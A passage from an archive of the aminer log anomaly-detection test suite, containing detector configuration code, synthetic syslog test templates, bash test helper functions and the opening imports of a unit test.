unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('OptionalMatchModelElement', FirstMatchModelElement('FirstMatchModelElement', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), AnyByteDataModelElement('AnyByteDataModelElement')]))) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers = [stream_printer_event_handler, syslog_event_handler, mail_notification_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) syslog_high_performance-template000066400000000000000000000161711500476301700343510ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in syslog_low_performance_many_outputs-template000066400000000000000000000202031500476301700370510ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 CPU Temp: 62°C, CPU Workload: 82%, 2019-09-19 16:33:39 CPU Temp: 30°C, CPU Workload: 77%, 2019-09-19 16:33:39 CPU Temp: 42°C, CPU Workload: 62%, 2019-09-19 16:33:39 CPU Temp: 31°C, CPU Workload: 43%, 2019-09-19 16:33:40 CPU Temp: 84°C, CPU Workload: 77%, 2019-09-19 16:33:40 CPU Temp: 43°C, CPU Workload: 34%, 2019-09-19 16:33:40 CPU Temp: 59°C, CPU Workload: 56%, 2019-09-19 16:33:40 CPU Temp: 61°C, CPU Workload: 44%, 2019-09-19 16:33:41 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in User user logged in 6 minutes ago. User root logged in 6 minutes ago. dafsdff12%3§fasß?–_=yy VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg== Current DateTime: 19.09.2019 16:34:26 -25878952156245.222239655488955 - 3695465546654 This is some part of a csv file; match data: 25000 b654686973206973206a7573742061206e6f726d616c2074657874 Gateway IP-Address: 192.168.128.225 Feb 25 2019 The-searched-element-was-found! drawn number: 38drawn number: 30drawn number: 15drawn number: 5drawn number: 9 --------------------------------------------------------------------- lbtujyvysrcry logdata-anomaly-miner-2.8.0/aecid-testsuite/testFunctions.sh000077500000000000000000000047231500476301700242160ustar00rootroot00000000000000#!/bin/bash function testConfigError() { RET=0 if [[ !$# -eq 2 ]]; then echo echo "testConfigError() needs exactly 2 parameters!" return 1 fi if [[ `grep -ic "VerboseUnparsedAtomHandler" $1` != 0 ]] || `grep -Fq "Traceback" $1` || `grep -Fq "{'Parser'" $1` || `grep -Fq "FATAL" $1` || `grep -Fq "Config-Error" $1`; then echo "$2" RET=1 cat $1 echo echo fi return $RET } function compareStrings() { RET=0 if [[ !$# -eq 3 ]]; then echo echo "compareStrings() needs exactly 3 parameters!" return 1 fi if [[ "$1" != "$2" ]]; then echo "$1" echo echo "$3" echo echo "$2" echo RET=1 fi return $RET } function compareVersionStrings(){ if [[ !$# -eq 2 ]]; then echo "compareVersionStrings() needs exactly 2 parameters!" return -1 fi IFS='-' read -ra VERSION <<< "$1" VERSION="${VERSION[0]}" IFS='.' read -ra V1 <<< "$VERSION" IFS='-' read -ra VERSION <<< "$2" VERSION="${VERSION[0]}" IFS='.' read -ra V2 <<< "$VERSION" LEN1=${#V1[@]} LEN2=${#V2[@]} LEN=$(( LEN1 < LEN2 ? LEN1 : LEN2 )) # minimum length for ((i=0; i < $LEN; i++)); do if [[ "${V1[i]}" -lt "${V2[i]}" ]]; then return 2 elif [[ "${V1[i]}" -gt "${V2[i]}" ]]; then return 1 fi done return 0 } function runAminerUntilEnd() { CMD=$1 LOGFILE=$2 REP_PATH=$3 CFG_PATH=$4 USER=`stat -c '%U' $CFG_PATH` if [[ $CFG_PATH == *.py ]]; then echo "config_properties['Core.PersistencePeriod'] = 1" | sudo -u $USER tee -a $CFG_PATH > /dev/null elif [[ $CFG_PATH == *.yml ]]; then echo "Core.PersistencePeriod: 1" | sudo -u $USER tee -a $CFG_PATH > /dev/null else return 2 fi sudo rm $REP_PATH 2> /dev/null if [ $# -ge 5 ]; then OUT=$5 $CMD > $OUT & elif [ $# -eq 4 ]; then $CMD & fi PID=$! FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null` IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=0 while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 120 ]]; do sleep 1 IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=$((++CNTR)) done sleep 3 sudo sed -i '$d' $CFG_PATH # delete PersistencePeriod config in file. if [ $# -lt 6 ]; then sudo pkill -x aminer.py wait $PID RES=$? return $RES fi return $PID } logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/000077500000000000000000000000001500476301700217605ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/AnalysisComponentsPerformanceTest.py000066400000000000000000002471341500476301700312200ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathListValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.analysis.AtomFilters import MatchPathFilter, SubhandlerFilter, MatchValueFilter from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.analysis.HistogramAnalysis import ModuloTimeBinDefinition, HistogramData, HistogramAnalysis from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from aminer.analysis.Rules import 